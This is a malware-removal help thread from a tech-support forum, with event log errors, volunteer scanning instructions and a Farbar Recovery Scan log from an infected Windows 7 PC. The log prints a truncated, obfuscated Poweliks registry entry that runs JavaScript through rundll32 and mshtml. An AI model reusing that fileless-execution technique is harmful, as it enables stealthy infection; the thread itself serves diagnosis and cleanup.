12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The IP Helper service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The DNS Client service depends on the NetIO Legacy TDI Support Driver service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The DHCP Client service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 6:54:35 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8017ff1010, 0xfffff880052c1910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-23868-01.
12/27/2014 6:28:03 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa802111f010, 0xfffff88004f45910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-32963-01.
12/27/2014 10:10:12 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa80195f84e0, 0xfffff88005690910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-26598-01.
.
==== End Of File ===========================
 



#3 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,769 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:28 PM

Posted 02 January 2015 - 08:25 AM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

step1.gif In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/561235 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

step2.gifIf you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your destop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#4 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 02 January 2015 - 10:38 AM

Thank you for responding.

 

I am at work and will follow your instructions as soon as i get home tonight !



#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 02 January 2015 - 11:06 AM

Greetings baabel and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that. :thumbup2:

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started :thumbup2:
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. While I review our situation please run the below for me.

I would llike to start by booting your computer in a special way. Based on your description this should allow us to run some programs without the risk of a Blue Screen.

===================================================

Using Low Resolution Video From Advanced Startup Options Screen - Windows 7/Vista

--------------------
  • Restart your computer
  • Press F8 until you are presented with the Advanced Startup Options menu
  • Using the down arrow select Enable low resolution video and press Enter
  • Your screen will appear as if you are running in Safe Mode, this is normal
===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your desktop <<< Important
  • If you are unsure if you have 32 bit or 64 bit simply download and try one. If that doesn't run properly the other one should
  • Double click the icon
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
===================================================

System Summary Information

--------------------
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • FRST results
  • Addition log
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#6 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 02 January 2015 - 04:05 PM

Thank you so much !

 

While I was working Avast told me that it stopped four or five malwares.

 

Here are the two files.

 

Unfortunately, the zipped Summary is 93.8 KB which is somewhat above the 82.11 KB upload maximum.  It did appear to take a long time with "Error Reporting" (I think that was the name of the section but am not positive).  What should I do about this?

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-12-2014
Ran by anonymous (administrator) on ANONYMOUS-PC on 02-01-2015 15:45:00
Running from C:\Users\anonymous\Desktop
Loaded Profile: anonymous (Available profiles: anonymous)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AVAST Software) C:\Security\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
(The Eraser Project) C:\Security\Eraser\Eraser.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Genie-soft) C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Alcor Micro Corp.) C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\AOL\1341429429\ee\aolsoftware.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Security\Avast\avastui.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ArcCon.ac
(Apple Inc.) C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(WinZip Computing, Inc.) C:\Program Files (x86)\WinZip\WZQKPICK.EXE
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Dell, Inc.) C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell DataSafe Local Backup\Toaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
() C:\Program Files (x86)\Dell DataSafe Local Backup\Components\Scheduler\STService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Avast Software) C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(AVAST Software) C:\Security\Avast\ng\ngservice.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Audiovisual & Graphics\Photoshop Elements 10\Adobe Photoshop Elements 10\PSE 10\INSTALLED\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6457960 2011-12-23] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1156712 2011-11-15] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [1014432 2011-12-29] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe [800416 2011-12-29] (Atheros Commnucations)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-03] (CANON INC.)
HKLM\...\Run: [Eraser] => C:\Security\Eraser\Eraser.exe [980920 2012-05-22] (The Eraser Project)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [GBMPro8Agentx64] => "C:\Program Files\Genie-Soft\GBMPro8x64\GBMAgent.exe"
HKLM\...\Run: [Acronis Scheduler2 Service] => C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [358200 2010-12-11] (Acronis)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-11-29] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-17] (Intel Corporation)
HKLM-x32\...\Run: [ShwiconXP9106] => C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe [237568 2010-03-10] (Alcor Micro Corp.)
HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2012-01-20] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Dell DataSafe Online] => C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe [1117528 2010-08-25] (Dell, Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-12-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1021128 2014-11-20] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ArcSoft Connection Service] => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207424 2010-10-27] (ArcSoft Inc.)
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1341429429\ee\AOLSoftware.exe [41800 2010-03-08] (AOL Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] => C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [5111464 2010-12-11] (Acronis)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [395656 2013-10-01] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AvastUI.exe] => C:\Security\Avast\AvastUI.exe [5227112 2014-12-12] (AVAST Software)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153992 2013-10-01] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation)
HKLM-x32\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKLM-x32\...\Run: [iTunesHelper] => C:\Audiovisual & Graphics\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\822\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [GBMPro9Agent] => C:\Program Files\Genie9\Genie Backup Manager\GBMAgent.exe [250456 2012-05-29] (Genie-soft)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-08-07] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7063832 2014-11-21] (Piriform Ltd)
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...\RunOnce: [Adobe Speed Launcher] => 1420231297
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [WinCalendar V4] => C:\Program Files (x86)\WinCalendar V4\WinCalendarV4_SysTray.exe [80856 2014-02-08] (Sapro Systems)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-08-07] (Garmin Ltd or its subsidiaries)
AppInit_DLLs-x32: C:\PROGRA~2\Citrix\ICACLI~1\RSHook.dll => C:\Program Files (x86)\Citrix\ICA Client\RSHook.dll [256568 2012-12-14] (Citrix Systems, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files (x86)\WinZip\WZQKPICK.EXE (WinZip Computing, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Security\Avast\ashShA64.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKU\S-1-5-21-3319101212-3949270613-1064135436-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL = http://www.bing.com/search?q={searchTerms}&form=DLCDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL = http://www.bing.com/search?q={searchTerms}&form=DLCDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> {4AC4BCB8-871A-4045-8313-4C6868E5D5E8} URL =
SearchScopes: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Security\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll (Hewlett-Packard Co.)
BHO-x32: Spybot-S&D IE Protection -> {53707962-6F74-2D53-2644-206D7942484F} -> C:\Security\SpyBot\SPYBOT~1\SDHelper.dll No File
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Security\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO-x32: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll (Yahoo! Inc)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
